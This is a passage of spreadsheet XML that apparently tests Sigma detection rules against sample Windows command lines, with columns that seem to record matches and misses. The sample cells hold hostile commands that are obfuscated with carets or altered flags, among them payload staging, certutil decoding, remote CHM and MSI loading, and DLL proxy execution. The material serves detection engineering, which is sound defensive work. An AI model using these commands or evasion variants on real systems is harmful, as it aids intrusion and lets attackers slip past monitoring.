      </c>
      <c r="E3202" s="44" t="inlineStr">
        <is>
          <t>copy C:\temp\payload.exe %SystemRoot%\Fonts\payload.exe</t>
        </is>
      </c>
      <c r="F3202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3202" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3202" s="44" t="n"/>
      <c r="J3202" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3202" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3203" ht="15.75" customHeight="1" s="42">
      <c r="A3203" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3203" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C3203" s="44" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D3203" s="44" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E3203" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F3203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3203" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3203" s="43" t="n"/>
      <c r="J3203" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3203" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3204" ht="15.75" customHeight="1" s="42">
      <c r="A3204" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B3204" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pester_1</t>
        </is>
      </c>
      <c r="C3204" s="44" t="inlineStr">
        <is>
          <t>Execute Code with Pester.bat</t>
        </is>
      </c>
      <c r="D3204" s="44" t="inlineStr">
        <is>
          <t>59e938ff-0d6d-4dc3-b13f-36cc28734d4e</t>
        </is>
      </c>
      <c r="E3204" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "p^ester.bat \" calc.exe; help\""</t>
        </is>
      </c>
      <c r="F3204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3204" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3204" s="43" t="n"/>
      <c r="J3204" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3204" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3205" ht="15.75" customHeight="1" s="42">
      <c r="A3205" s="43" t="n"/>
      <c r="B3205" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmdl32_arbitrary_file_download</t>
        </is>
      </c>
      <c r="C3205" s="44" t="inlineStr">
        <is>
          <t>Potential Arbitrary File Download Via Cmdl32.EXE</t>
        </is>
      </c>
      <c r="D3205" s="44" t="inlineStr">
        <is>
          <t>f37aba28-a9e6-4045-882c-d5004043b337</t>
        </is>
      </c>
      <c r="E3205" s="44" t="inlineStr">
        <is>
          <t>cmdl32.exe -vpn -lan C:\path\to\config.txt</t>
        </is>
      </c>
      <c r="F3205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3205" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3205" s="43" t="n"/>
      <c r="J3205" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3205" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3206" ht="15.75" customHeight="1" s="42">
      <c r="A3206" s="43" t="n"/>
      <c r="B3206" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3206" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3206" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3206" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F3206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3206" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3206" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3206" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3206" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3206" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3207" ht="15.75" customHeight="1" s="42">
      <c r="A3207" s="43" t="n"/>
      <c r="B3207" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3207" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3207" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3207" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F3207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3207" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3207" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3207" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3207" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3207" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3208" ht="15.75" customHeight="1" s="42">
      <c r="A3208" s="43" t="n"/>
      <c r="B3208" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3208" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3208" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3208" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F3208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3208" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3208" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3208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08" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3208" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3209" ht="15.75" customHeight="1" s="42">
      <c r="A3209" s="43" t="n"/>
      <c r="B3209" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3209" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3209" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3209" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F3209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3209" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3209" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3209" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3209" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3209" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3210" ht="15.75" customHeight="1" s="42">
      <c r="A3210" s="43" t="n"/>
      <c r="B3210" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3210" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3210" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3210" s="43" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F3210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3210" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3210" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3210" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3210" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3210" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3211" ht="15.75" customHeight="1" s="42">
      <c r="A3211" s="43" t="n"/>
      <c r="B3211" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3211" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3211" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3211" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3211" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3211" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3211" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3211" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3211" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3212" ht="15.75" customHeight="1" s="42">
      <c r="A3212" s="43" t="n"/>
      <c r="B3212" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3212" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3212" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3212" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3212" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3212" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3212" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3212" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3212" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3213" ht="15.75" customHeight="1" s="42">
      <c r="A3213" s="43" t="n"/>
      <c r="B3213" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3213" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3213" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3213" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3213" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3213" s="44" t="n"/>
      <c r="J3213" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3213" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3214" ht="15.75" customHeight="1" s="42">
      <c r="A3214" s="43" t="n"/>
      <c r="B3214" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3214" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3214" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3214" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F3214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3214" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3214" s="44" t="n"/>
      <c r="J3214" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3214" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3215" ht="15.75" customHeight="1" s="42">
      <c r="A3215" s="43" t="n"/>
      <c r="B3215" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3215" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3215" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3215" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F3215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3215" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3215" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3215" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3215" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3215" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3216" ht="15.75" customHeight="1" s="42">
      <c r="A3216" s="43" t="n"/>
      <c r="B3216" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3216" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3216" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3216" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F3216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3216" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3216" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3216" s="43" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3216" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3216" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3217" ht="15.75" customHeight="1" s="42">
      <c r="A3217" s="43" t="n"/>
      <c r="B3217" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3217" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3217" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3217" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F3217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3217" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3217" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3217" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3217" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3217" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3218" ht="15.75" customHeight="1" s="42">
      <c r="A3218" s="43" t="n"/>
      <c r="B3218" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3218" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3218" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3218" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F3218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3218" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3218" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3218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18" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3218" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3219" ht="15.75" customHeight="1" s="42">
      <c r="A3219" s="43" t="n"/>
      <c r="B3219" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C3219" s="44" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D3219" s="44" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E3219" s="43" t="inlineStr">
        <is>
          <t>copy payload.zip payload.txt &amp;&amp; certutil -decodehex payload.txt payload.exe</t>
        </is>
      </c>
      <c r="F3219" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3219" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I3219" s="43" t="n"/>
      <c r="J3219" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K3219" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3220" ht="15.75" customHeight="1" s="42">
      <c r="A3220" s="44" t="n"/>
      <c r="B3220" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3220" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3220" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3220" s="4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3220" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3220" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3220" s="4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3220" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3220" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3221" ht="15.75" customHeight="1" s="42">
      <c r="A3221" s="44" t="n"/>
      <c r="B3221" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3221" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3221" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3221" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3221" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3221" s="44" t="n"/>
      <c r="J3221" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3221" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3222" ht="15.75" customHeight="1" s="42">
      <c r="A3222" s="44" t="n"/>
      <c r="B3222" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3222" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3222" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3222" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -w Hidden -C "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3222" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3222" s="44" t="n"/>
      <c r="J3222" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3222" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3223" ht="15.75" customHeight="1" s="42">
      <c r="A3223" s="44" t="n"/>
      <c r="B3223" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi_remote</t>
        </is>
      </c>
      <c r="C3223" s="44" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location</t>
        </is>
      </c>
      <c r="D3223" s="44" t="inlineStr">
        <is>
          <t>222720a7-047f-4054-baa5-bab9be757db0</t>
        </is>
      </c>
      <c r="E3223" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -W Hidden -c "$u='ht'+'tps://example.com/';$i=New-Object -Com ('WindowsInstaller.Installer');$i.UILevel=2;$i.InstallProduct ( $u,'')"</t>
        </is>
      </c>
      <c r="F3223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3223" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3223" s="44" t="n"/>
      <c r="J3223" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3223" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3224" ht="15.75" customHeight="1" s="42">
      <c r="A3224" s="44" t="n"/>
      <c r="B3224" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vscode_child_processes_anomalies</t>
        </is>
      </c>
      <c r="C3224" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Child Process Of VsCode</t>
        </is>
      </c>
      <c r="D3224" s="44" t="inlineStr">
        <is>
          <t>5a3164f2-b373-4152-93cf-090b13c12d27</t>
        </is>
      </c>
      <c r="E3224" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\ProgramData\payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F3224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3224" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3224" s="44" t="n"/>
      <c r="J3224" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K3224" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3225" ht="15.75" customHeight="1" s="42">
      <c r="A3225" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3225" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3225" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3225" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3225" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c wuauclt.exe /UpdateDe^ploymentProvider "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll" /RunHandlerComServer</t>
        </is>
      </c>
      <c r="F3225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3225" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3225" s="44" t="n"/>
      <c r="J3225" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K3225" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3226" ht="15.75" customHeight="1" s="42">
      <c r="A3226" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3226" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3226" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3226" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3226" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /"UpdateDeploymentProvider" "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll" /"RunHandlerComServer"</t>
        </is>
      </c>
      <c r="F3226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3226" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3226" s="43" t="n"/>
      <c r="J3226" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K3226" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3227" ht="15.75" customHeight="1" s="42">
      <c r="A3227" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3227" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3227" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3227" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3227" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe -UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll" -RunHandlerComServer</t>
        </is>
      </c>
      <c r="F3227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3227" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3227" s="44" t="n"/>
      <c r="J3227" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K3227" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3228" ht="15.75" customHeight="1" s="42">
      <c r="A3228" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3228" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wuauclt_dll_loading</t>
        </is>
      </c>
      <c r="C3228" s="44" t="inlineStr">
        <is>
          <t>Proxy Execution Via Wuauclt.EXE</t>
        </is>
      </c>
      <c r="D3228" s="44" t="inlineStr">
        <is>
          <t>af77cf95-c469-471c-b6a0-946c685c4798</t>
        </is>
      </c>
      <c r="E3228" s="44" t="inlineStr">
        <is>
          <t>wuauclt.exe /RunHandlerComServer /UpdateDeploymentProvider "C:\AtomicRedTeam\atomics\T1218_x0008_in\calc.dll"</t>
        </is>
      </c>
      <c r="F3228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3228" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3228" s="43" t="n"/>
      <c r="J3228" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K3228" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3229" ht="15.75" customHeight="1" s="42">
      <c r="A3229" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3229" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C3229" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D3229" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E3229" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F3229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3229" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3229" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3229" s="43" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J3229" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3229" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3230" ht="15.75" customHeight="1" s="42">
      <c r="A3230" s="44" t="inlineStr">
        <is>
          <t>t1218.001</t>
        </is>
      </c>
      <c r="B3230" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
